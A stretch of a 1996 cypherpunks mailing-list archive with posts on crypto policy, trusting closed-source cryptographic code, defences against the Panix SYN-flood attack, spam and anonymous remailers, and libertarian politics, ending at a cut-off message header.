= on concealed weapons carries. Not only that, but even NPR has even
= admitted that it has been effective.

        Agreed on the restoration of concealed weapons rights which
    had been regulated out of existence.

        Granted, Joe-Six-Pack may not be the perfect analogy, but I 
    refer to America's working class, blue collar and the grunts of 
    the white collars as Joe-Six-Pack --maybe I should say 
    Joe-Couch-Potato.  the class" referenced is a collection of many
    levels --what they have in common is they work and then confrom
    to the current norm of 7.2 hrs/day in front of the tube which
becomes
    their entire source of information --THEY will sell out from
ignorance.

        If you refer to Joe-Six-Pack as the the classic Southern red 
    neck, any attempt to limit their freedom, particularly the right
to
    a pickup truck with a gun rack, and their handguns --that's a very
    different situation. and that extends to small town westerners, 
    like myself, and to the plains.  I grew up on a farm, went to 
    Harvard, joined the spooks for six years of a bloodpath, bounced
    around the world in different fields, and I am back in a very
small 
    community in the high desert: 100 families.  Noone around here 
    questions my bad attitude --the admissions requirements are at 
    least 5 kids and 2000 rounds.

        However, I think Joe-Six-Pack, in this constrained social set,
    for the vast majority would sell out on freedom of cryptography.
    they do not understand it, particularly against the onslaught of 
    the pinko-liberal captive media.  Our job is to educate them --and
    not with defiant rhetoric (such as mine).

        As for concealed weapons permits, bank robberies should 
    certainly drop --all it would take is one cowboy (and I'll 
    volunteer) and anything other than a large coordinated operation
    is in serious trouble.  One unsuspected, mean and surly patron 
    with a .357 who seriously knows how and when to use same is 
    very effective.  On the other hand, I do not recommend carrying
    an assault rifle on a sling over your shoulder to visit the
bank....

        The simple (I think) point I was trying to make was: the vast
    majority of our U.S. citizens would acquiesce to the deployment 
    of federal troops in return for security, rather than being armed,

    Posse Comitas not withstanding, to wipe crime off the streets.  
    The point could even be made: the troops might as well be doing 
    something useful rather than sitting around their bases; we do 
    have a rather large standing army --unfortunately, they would 
    become poorly trained and poorly disciplined --and could easily
    be part of the massive corruption in our cities (and every other
    government over many people).  Frankly, we should all vote in 
    a _free_ cyberspace;  forget the current system of choosing
    party loyalists and presidential electors.

        The application of a military mentality on the streets is not 
    my idea of law and order --they could kill off the majority of 
    the crime by legalizing all drugs and dispensing them in clinics.
    Britain reduced their second story (burglary) crime rate by over 
    60%; they did find they had a great many more addicts than the 
    thought, however.  A second benefit is that it takes some of the 
    mystery and challenge out of drugs --however, be prepared for the
    alcohol problem, although that effect would be significantly less
    than the current social cost of having 10% of the male black 
    population in lockdown.

        no, my bottome line is the Bubba has sunk to bottom with 
    paranoia, both he and the elite money interests which jerk all of
    the politicial habituites who depend on their soft money for their

    campaings and who wish to participate at the trough of influence 
    and greed (ever see someone retired after many years in Washington
    without a bundle).

            --attila


--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 13 Sep 1996 09:05:43 +0800
To: mac-crypto@thumper.vmeng.com
Subject: Gaining trust in OCO crypto code
Message-ID: <199609122203.PAA25166@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


These thoughts came up at the Mac Crypto conference, but are somewhat more
general than the Macintosh, so I am ccing them to cypherpunks.

OCO, or Object Code Only, a bad idea whose time has not yet past (although
it was part of the reason for the decline of IBM's mainframe operating
systems), is the business practice of keeping the source code for a system
secret.  Some companies are applying the idea to cryptographic software, so
the we should think about how we can establish trust in such software.

There are three techniques which may work for all OCO software.

(1) Trust the designer/implementor.  Ron Rivest's RC2 and RC4 algorithms
were originally released as OCO algorithms.  Rivest's reputation as a
cryptographer established trust in them.

(2) Trust a third party auditing agency.  The US military trusts vendor
implementations of cryptographic software because they have been audited by
the NSA.

(3) Reverse engineer the implementation.  While laborious, this process is
straight forward.  When Netscape started using RC4 in their SSL
implementation, a review of its security became important enough that a
certain anonymous person(s) reverse engineered the implementation and
posted it to the Internet.  As a result, the algorithm has undergone peer
review.


If we can't use the above techniques, we have to think very carefully about
what parts of a cryptographic system we can trust by only examining their
inputs and outputs.  Here is a list of things we can NOT trust in this
manner:

(1) Random number generation.  An error (as occurred in a Netscape
implementation), or a deliberate weakness can not be easily detected by
examining only the output of a cryptographic random number generator.

(2) Key generation.  There are published ways to encode an RSA secret key
in the corresponding RSA public key.  A key generation algorithm which only
uses 32 bits of the random number would be hard to detect, but easy to
break by one who knew its secret.  You have to be able to examine in detail
how keys are generated.


Now there are some things we might be able to trust based only on an
examination of the inputs and outputs.

(1) Implementation of a cryptographic algorithm.  If we can feed it enough
test cases, and compare the output with a public, well vetted
implementation, we can come to believe that it is correct.

(2) Certain cryptographic protocols.  If we can trust one side of a
Diffie-Hellman (DH) key exchange, then we can trust the keys generated
because both sides contribute to the randomness of those keys.  However we
can't trust two instances of an OCO DH exchange implementation working with
each other, so this trust doesn't seem to cover many practical instances.

If the OCO protocol implementation can interoperate with a trusted
implementation, then we can start to have some trust in it.  However, we
will still have to carefully examine the protocol for covert channels. 
This form of trust may be of real-world use.


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johan Helsingius <julf@penet.fi>
Date: Fri, 13 Sep 1996 01:03:58 +0800
To: Andy Dustman <andy@CCMSD.chem.uga.edu>
Subject: Re: na673130@anon.penet.fi gone [Anonymous service rejected your mail.] (fwd)
Message-ID: <1.5.4.32.19960912122408.0073d650@pentu.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


At 21:49 96/09/11 -0400, Andy Dustman wrote:

>Looks like Spambo either deleted his id or Julf pulled the plug on him.

I pulled his plug. But his real address has been on this list several times. 

        Julf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 13 Sep 1996 06:22:15 +0800
To: cypherpunks@toad.com
Subject: Re: Excite Live!
Message-ID: <01I9EA0TKKDS9ULOQC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"live@excite.com" 11-SEP-1996 22:14:03.06

>A request was made for the location of your Excite Live! page

>Found your Excite Live at URL
>http://live.excite.com/?uid=CEC8C99632372D6E

	Hi. As you can see from the above, I've set up an Excite Live!
page up with the email address of cypherpunks@toad.com. It has top priority
on things related to cypherpunks, including technology news, political news,
international news, etcetera, plus some build-in links and searches to
appropriate places. I'd advise using the anonymizer to access the above
link (http://www.anonymizer.com:8080/http://live.excite.com/?uid=).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 13 Sep 1996 06:24:31 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Panix attack
In-Reply-To: <199609121743.RAA13735@pipe3.t1.usa.pipeline.com>
Message-ID: <Pine.SUN.3.91.960912152105.966A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, John Young wrote:

> WSJ and WaPo have reports on Panix-jamming by info-request bombardment, and
> Bell Labs security expert Bill Cheswick's attempt to solve it. 

This particular attack has been known for some time; kind of suprising it 
hasn't been used before. It is defensible, but it can take a lot of 
memory to give full protection.

The best way IPV4 way I know of to stop the listen queue being filled is to
use a special structure to hold half-open incoming connections, and not
allocate the full TCB until the ack of the syn-ack comes in; that way, the
listen queue can be made large enough to keep enouygh connections to cover
the number of SYNS recievable before the half-open connection times out 

This ensures that there's at least a traceable return address for the 
connection. Sort of like photuris cookies but without the forced RTT delay

(The timeout was added to most stacks in 94 after backbone fuckups caused
queues to wedge on most of the big web servers with all sorts of asymetric
routing problems. It's not strictly legal TCP)



----
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 13 Sep 1996 07:19:38 +0800
To: cypherpunks@toad.com
Subject: Re: Kook Of The Month
In-Reply-To: <199609121549.RAA06613@spoof.bart.nl>
Message-ID: <u7q6TD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From remailer@mailhub.bart.nl  Thu Sep 12 11:48:50 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Thu, 12 Sep 96 13:14:35 EDT
	for dlv
Received: from [194.158.160.11] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA27439 for dlv@bwalk.dm.com; Thu, 12 Sep 96 11:48:50 -0400
Received: (from remailer@localhost) by spoof.bart.nl (8.7.5/8.6.8) id RAA06613 for dlv@bwalk.dm.com; Thu, 12 Sep 1996 17:49:57 +0200 (MET DST)
Date: Thu, 12 Sep 1996 17:49:57 +0200 (MET DST)
Message-Id: <199609121549.RAA06613@spoof.bart.nl>
To: dlv@bwalk.dm.com
From: remailer@2005.bart.nl (Anonymous)
Comments: Please report misuse of this automated remailing service to <remailer-admin@remailer.nl.com>
 The contents of this message are neither approved or
 condoned by nl.com or our host bART Internet.
 *** Replying to it will not send your reply to the sender ***
 There is no way to determine the originator of this message. If you wish to be blocked from receiving all anonymous mail, send your request to the <remailer-operators@c2.org> mailing list.  The operator of this particular remailer can be reached at <remailer-admin@remailer.nl.com>
Subject: Kook Of The Month

Eat this Dr. Scum Bag
Return-Path: <cypherpunks-errors@toad.com>
To: stewarts@ix.netcom.com
Cc: postmaster@netcom.com, abuse@netcom.com, security@netcom.com
Subject: Unsolicited harrassing e-mail from <stewarts@ix.netcom.com>
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 11 Sep 96 21:37:09 EDT
Sender: owner-cypherpunks@toad.com

Please stop e-mailing me, cc:ing me, or otherwise harrassing me.
I have no connection with the thread you're quoting and don't
want to receive any more e-mail from you.

stewarts@ix.netcom.com writes:

> >> There
> >> are a number of anonymous remailers out in cyberspace, but it has been
> >> stated by a knowledgeable source that a number of them are being operated
> >> by law enforcement agencies (presumably to troll for criminal activity). A
> >
> >Can someone verify/discredit/comment on this statement?  Who is the
> >knowledgeable source?
>
> Definitely true.  Zero is a number, and there are also larger numbers.
> KOTM = Kook Of The Month.
>
> #			Thanks;  Bill
> # Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
> # <A HREF="http://idiom.com/~wcs"> 	
> # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto
>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 13 Sep 1996 07:04:26 +0800
To: cypherpunks@toad.com
Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW
Message-ID: <v0300781bae5e1b4f6e60@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


I think someone should just stand right up and accuse the NSA, at the
behest of the Whitehouse, of running a denial of service attack on Panix at
*exactly* the time when VTW is lobbying its hardest on the PRO-CODE bill.

Ooops. I just did....

;-)

None *dare* call it conspiracy,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HipCrime <robert@precipice.v-site.net>
Date: Fri, 13 Sep 1996 09:07:42 +0800
To: cypherpunks@toad.com
Subject: common sense
Message-ID: <323896EE.3BC3@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain


> And rather than "dispensing drugs in clinics," why not simply
> scrap the drug laws entirely?  People have a *right* to do as
> they please with their bodies.

Let's hear it for common sense.  It's the first decent posting I've
seen to this list.


-- HTTP://www.HIPCRIME.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 13 Sep 1996 07:22:30 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Burns' statement on postponement of Crypto vote today.
Message-ID: <v0300781eae5e1ea8378a@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Thu, 12 Sep 1996 15:30:19 -0400
To: 1e$pam
From: Robert Hettinga <rah@shipwright.com>
Subject: Re: Sen. Burns' statement on postponement of Crypto vote today.
Cc:
Bcc:
X-Attachments:


--- begin forwarded text


From: somebody
Date: Thu, 12 Sep 1996 15:03:21 -0400
To: rah@shipwright.com
Subject: Re: Sen. Burns' statement on postponement of Crypto vote today.

Robert--
My sources indicate that no markup will be
held on the Burns bill before Congress adjourns for year. Not clear the votes
were there, plus the Administration had Dems lined up to offer weakening
amendments. Also, the hearing scheduled yesterday in House Judiciary for its
counterpart bill was postponed until Sept. 25; that is 3 days prior to
adjournment target, and I wouldn't be surprised if  it never takes place.
In other words, most likely prospect is for no action -- not even favorable
reporting by a Cmte. -- before Congress goes home. Administration in next two
weeks will unveil its "new and improved" encryption policy, which will likely
offer a shift in licensing to Commerce Dept., and gradual easing of
exportable strength, in exchange for industry-funded key escrow management
demo projects.

And that's the way it is (Political reality is not optional).
You can pass this info. along, as long as you do not attribute it to me.


--- end forwarded text




--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 13 Sep 1996 07:12:29 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Panix attack
In-Reply-To: <Pine.SUN.3.91.960912152105.966A-100000@tipper.oit.unc.edu>
Message-ID: <199609122021.QAA07296@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> This ensures that there's at least a traceable return address for the 
> connection. Sort of like photuris cookies but without the forced RTT delay

Not really. The genius of the Photuris cookie is that it induces no
state at all in the responder, thanks to crypto tricks.

I agree, though, that you can harden hosts against TCP floods.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 13 Sep 1996 07:46:29 +0800
To: cypherpunks@toad.com
Subject: Informal Renegotiation of the Law
Message-ID: <2.2.32.19960912204730.006977ac@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Many people on this list and in the larger world focus on laws and
regulations and sometimes act as if that is the only way that the relative
rights and duties of governments and civilians are established.  In fact,
there is a lot of informal negotiation going on all the time.  This is
significant because an unenforced law isn't a law at all.

For example, you will not read anywhere that compulsory education laws have
been repealed -- but they have.  When the home schooling movement started in
the late 1970s, there were occasional harassment and prosecution of parents.
The home schoolers won some and lost some.  As time went on, the authorities
came to accept home schoolers so that at this point, legal problems are
rare.  Compulsory education has been effectively repealed by the actions of
refusenicks in both the subject population and the enforcement population.  

This same process will occur more frequently in the future as libertarian
memes spread, government enforcement resources shrink, and people's vastly
different attitudes as to what should be legal and illegal make a monopoly
legal regime impossible to keep in place.

Note that unlicensed immigration is against the law.  Note that some
websites post material that others would like banned.  Maybe you can deport
a few or ban a few.  But how many?  If you have three million illegal aliens
or 3 million individual ISPs (people with high speed connections running
their own sites) you can't deport them or shut them down because it simply
takes too much time and too many enforcement resources.  The authorities
give up.  You get de facto open immigration and a de facto unregulated Net.
Coercion is expensive and slow.  Free exchange is cheap and fast.  That's
why free exchange wins in the long run.

It's not a victory without losses.  Some people are busted.  Some sites are
shut down.  You don't go into battle expecting zero casualties.  But what
counts in the end is who wins.  And we've got them outnumbered by far.

DCF  

"So you think you can handle 3 million sites?  Wait a few years and you can
try to handle 300 million."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 13 Sep 1996 10:38:50 +0800
To: Admin <wombat@mcfeely.bsfs.org>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <199609122357.QAA24466@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote:

> > 
> > These people have invited the email, and the associated expense, by placing
> > a public email-to: button on their public www page.

Correct!

>
> However, since others may think like you, I guess I'll have to add a line
> above my link stating that email not related to the purpose of my site
> will be happily proof-read at the rate of $200 per hour,

Just great.  That sure takes away any anonymity you had about being 
"on the cutting edge" of the information age.  That 1952 "proof-read" 
crap went out in the 70's.  How can you hope to enforce it?  It's a 
joke, right? :)  Maybe not, since it's on your sig-line.


> > A more acurate analogy,
> > and to the point, would be if a business sends you a postage pre-paid
> > business reply card, that is blank, and invites your comments on the card.
> > They can hardly complain of the expense when people actually send it in,
> > even if they don't like the comments.
> 
> No, this b.s. is more like having someone put a dead skunk in my mailbox, 
> with no return address, trying to prevent me from sending them 100 dead 
> skunks as a return favor. And about as welcome. 
> 

Sorry, Wombat.  As much as I hate to agree with this multi level 
long distance phone company spammer.  He is right.  A website is an 
open invitation to comment and e-mail.  Better password your site if 
you want to solve this problem.  Then no-one can visit it, and no-one 
can send out a spider to get your e-mail address.  That's what I do, 
send out a robot to bring back e-mail addresses.  Of course I only 
send to makers of software, and my product applys to their world.

If you don't want spam in your mail box:

1. Don't have a website or don't put your e-mail address on your 
    website
2. Don't post to newsgroups
3. Don't post to mailing lists
4. If you post do so anonymously

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Fri, 13 Sep 1996 10:53:13 +0800
To: cypherpunks@toad.com
Subject: Observer's defense of "Internet Pornography" article
Message-ID: <v03007800ae5e5369499a@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


If you haven't overdosed on the Observer articles yet, you can read
their defense on http://www.observer.co.uk -- it is rather self-serving,
but it could have been worse.

The only revelation is that Demon (the major Internet provider) plans
to block access to some newsgroups/sites.

Also, assuming I read between the lines correctly, Demon receives three
billion (with a "b") e-mail messages per day. I can never remember whether
British usage is "thousand million," or "million million", but the numbers
seem a bit large in any case. Perhaps they mean "3 billion bytes of e-mail."
(Assume ten million Demon subscribers and three thousand million e-mail
messages. This implies that the average subscriber receives 300 e-mail
messages per day. Are they all subscribing to Cypherpunks?)

Some other numbers:

-- 180,000 newsgroup articles received per-day (per server).
-- "tens of terabytes of data, (each equivalent to 750,000 floppy
   disks) move across a network of about 10 million machines." This
   seesm to refer to all of the Internet.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 13 Sep 1996 08:00:52 +0800
To: cme@cybercash.com (Carl Ellison)
Subject: Re: ISODE Consortium X.509 Certification system
In-Reply-To: <3.0b11.32.19960912105914.0054f7b0@cybercash.com>
Message-ID: <199609122208.RAA06798@homeport.org>
MIME-Version: 1.0
Content-Type: text


Don't forget there are security vulnerabilities in X.509v3.  Ross
Anderson's 'Robustness Principles' paper discusses the weakness of
sign after encrypting.  In the Crypto '95 proceedings, or on his web
site.

Adam

Carl Ellison wrote:

|         It really bothers me whenever I see someone mouthing plattitudes
| about certificates, like: 
| 
| >The ITU-T, through X.509, recommend strong authentication based on public 
| >key cryptosystems as the basis for providing secure services. The ISODE 
| >Consortium uses X.509 as the core of its security strategy. 
| >X.509 provides a flexible, scaleable and manageable algorithm-independent 
| >authentication infrastructure, which can be used as the basis for a wide
| >range of security services such as message encryption and access control. 
| 
| Fact is, identity certification (which is what X.509 gives) is neither
| necessary nor sufficient for providing secure services -- and there's
| nothing magic about X.509.
| 
| There are marketeers, however, who want the world to believe that the
| generation and use of X.509 certs will somehow give you security -- so they
| can sell machinery or a service which makes those certs.
| 
|  - Carl
| 
| P.S.  My USENIX paper giving the case against certification authorities is
| on-line now at <ftp://ftp.clark.net/pub/cme/usenix.ps> =
| <http://www.clark.net/pub/cme/usenix.ps>
| 
| +------------------------------------------------------------------+
| |Carl M. Ellison       cme@acm.org    http://www.clark.net/pub/cme |
| |   PGP 2.6.2: 61 E2 DE 7F CB 9D 79 84  E9 C8 04 8B A6 32 21 A2    |
| +-Officer, officer, arrest that man. He's whistling a dirty song.--+
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 13 Sep 1996 11:12:53 +0800
To: cypherpunks@toad.com
Subject: Re: mailing lists
Message-ID: <199609130029.RAA25390@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


 On Or About: 12 Sep 96 at 18:11, Rabid Wombat wrote:
> 
> > more restricted. I'm personally against needing to pay the social costs of
> > more and more laws because someone is trying to make a buck any way he
> > can, regardless of the costs and annoyances to others.
> > 
> > Junk faxing was a blessedly short term fad, one that had to be legislated 
> > 
> > I'm completely in favor of allowing junk email, as long as "JUNK MAIL" is 
> > required to be the first thing on the subject line. PLONK!   ... but that 
> > will take yet another law ... 
> 
 Wombat:
 
 If you are "against needing to pay the social costs of more and more
 laws"  Then how come you want another one? 
 
> IE," as long as "JUNK MAIL" is required to be the first thing on
> the subject line. PLONK! >... but that will take yet another law
> > ... "!
 
 One more law to pay for, one foot in the door for the government. 
 Don't call for new legislation in order to not get spam!  Please.
 
 Ross


===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 13 Sep 1996 11:21:36 +0800
To: cypherpunks@toad.com
Subject: Fed appellate judge remarks re anonymity, free speech on the net
Message-ID: <2.2.32.19960913004019.006df548@pop.ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



The Daily Journal, a LA/SF legal newspaper had an article today (9/12) about
a lunchtime address given by Ninth Circuit Judge Alex Kozinski last Monday
at an Internet Law Symposium in Seattle.

The article quotes Kozinski as saying "I have a severe problem with
anonymous E-mailers . . . You don't have a right to walk up to somebody's
door and knock with a bag over your head." The article says Kozinski likened
anonymous E-mail to menacing someone.

Kozinski also suggested that computer-generated or morphed images of
children involved in sexual acts may not be protected under the Constitution
because of ongoing trauma to the child, while computer-generated or morphed
images of adults would be protected. 

The article says that Kozinski was skeptical that he or other federal judges
necessarily agreed with the 3rd Circuit's ruling in _ACLU v. Reno_ (finding
the CDA unconstitutional). 

Kozinski is considered relatively conservative and relatively libertarian,
as 9th Circuit judges go. 

Copies of the Daily Journal should be available at larger newsstands in CA;
interested parties might try DeLauer's on Broadway near 14th St in Oakland
if you're in my neck of the woods. (They usually have extras for the
preceding week or so.) Also try Barnes & Noble in Santa Monica or the
newsstand whose name escapes me in Westwood, if you're down there. 

(Also in today's news, the 9th Circuit upheld a CA statute forbidding sales
of material considered "harmful to minors" from vending machines.)

 
--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 13 Sep 1996 04:50:07 +0800
To: cypherpunks@toad.com
Subject: XPA_nix
Message-ID: <199609121743.RAA13735@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


WSJ and WaPo have reports on Panix-jamming by info-request bombardment, and
Bell Labs security expert Bill Cheswick's attempt to solve it. 
 
 
Cheswick opines,"This is the first major attack of a kind that I believe to
be the final Internet security problem." 
 
 
----- 
 
 
http://jya.com/xpanix.txt 
 
 
XPA_nix




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Fri, 13 Sep 1996 08:16:20 +0800
Subject: ISP-TV Interview with Solveig Bernstein
Message-ID: <199609122145.RAA12899@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement: Interview with Solveig Bernstein ***

Monday, September 16 
9:00 PM ET

Solveig Bernstein
Assistant Director of Telecommunications & Technology Studies
Cato Institute 

ISP-TV will present an interview with Solveig Bernstein from the Cato 
Institute.  Ms. Bernstein will be discussing legal issues concerning the
CDA, the upcoming Supreme Court case, and other telecom legal issues.

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Tue, 17 Sep 1996 12:51:58 +0800
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: ISP-TV Interview with Solveig Bernstein
Message-ID: <199609162351.QAA08718@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement: Interview with Solveig Bernstein ***

Monday, September 16 
9:00 PM ET

Solveig Bernstein
Assistant Director of Telecommunications & Technology Studies
Cato Institute 

ISP-TV will present an interview with Solveig Bernstein from the Cato 
Institute.  Ms. Bernstein will be discussing legal issues concerning the
CDA, the upcoming Supreme Court case, and other telecom legal issues.

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 13 Sep 1996 09:10:31 +0800
To: Admin <admin@superhot.com>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <199609121640.KAA19040@rintintin.Colorado.EDU>
Message-ID: <Pine.BSF.3.91.960912172832.4035A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> These people have invited the email, and the associated expense, by placing
> a public email-to: button on their public www page.


Most people put up an "email to:" button on a public page for 
communications related to what's on the page. It's quite a stretch to 
assume that this invites any and all email from anyone who cares to send 
whatever they want. I can't say I've ever seen one that said "Please send 
SPAM(tm) to:" ...

However, since others may think like you, I guess I'll have to add a line
above my link stating that email not related to the purpose of my site
will be happily proof-read at the rate of $200 per hour, 1 hour per 60
lines, minimum. Perhaps I'll get lucky. If I get a big enough chunk of 
SPAM(tm), it might be worth the costs of breaking down the anonymity.

Until know, I'd never really figured out what causes lawyers.  :)


> A more acurate analogy,
> and to the point, would be if a business sends you a postage pre-paid
> business reply card, that is blank, and invites your comments on the card.
> They can hardly complain of the expense when people actually send it in,
> even if they don't like the comments.

No, this b.s. is more like having someone put a dead skunk in my mailbox, 
with no return address, trying to prevent me from sending them 100 dead 
skunks as a return favor. And about as welcome. 

- r.w.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HipCrime <robert@precipice.v-site.net>
Date: Fri, 13 Sep 1996 11:25:43 +0800
To: cypherpunks@toad.com
Subject: who can count?
Message-ID: <3238B18E.7211@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain


> No, this b.s. is more like having someone put a dead skunk in my 
> mailbox, with no return address, trying to prevent me from sending 
> them 100 dead skunks as a return favor. And about as welcome.

100 dead skunks in exchange for ONE is exactly what this discussion
is all about.  You CypherWIMPS just love over-kill.  EmailRobot sent
ONE message to EACH address.  Are you guys so unskilled in arithmetic
to understand the difference between 1 and 100?

One message is NOT spam, 100 messages to a single box IS spamming.



-- HTTP://www.HIPCRIME.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Fri, 13 Sep 1996 08:24:10 +0800
To: cypherpunks@toad.com
Subject: Re: What is best policy paper on crypto?
In-Reply-To: <519dom$op5@life.ai.mit.edu>
Message-ID: <323889B7.6956@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> 
> Declan McCullagh wrote:
> | I happen to know that an influential Congresspern will be meeting with
> | some Cato folks tomorrow morning, so I'm assuming this isn't an idle
> | request.

>         The NAS report, despite a few silly points, does push for
> liberalization of the export regime, standardization, a switch to
> an 'assume export' stance, states that the debate can be carried out
> in public, and that classified information is not needed, and suggests
> that crypto can help reduce many threats to Americans.
> 
>         It does not suggest abolishing the ITARs, and suggests
> consideration of a law criminalizing the criminal use of crypto.

I agree that the NAS report is the one to use. Its from an authoratative
source and the conclusions are pretty reasonable. Its perhaps not as far
as some would like to go but if we got there it would be livable. Given
where we are it would make a good first step.


Some good lines from the talk included:

Re Dennings "If you know what I know argument", basically Lin said that
he did know and it made no difference at all to his point of view. Also
13 of the 16 members of the committee got "the briefing" - which is
all Dorothy bless her socks got, and the report was unanimous.

Re who is behind the anti crypto policy, its Freeh at the FBI and not
the NSA. The NSA know crypto and don't really care all that much. Gore
credited as guy who is holding Freeh back.


Seemed a reasonable enough guy, but a number in the audience were upset
that they didn't have someone like Dorothy who we can throw tomatoes at.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 13 Sep 1996 10:03:52 +0800
To: HipCrime <robert@precipice.v-site.net>
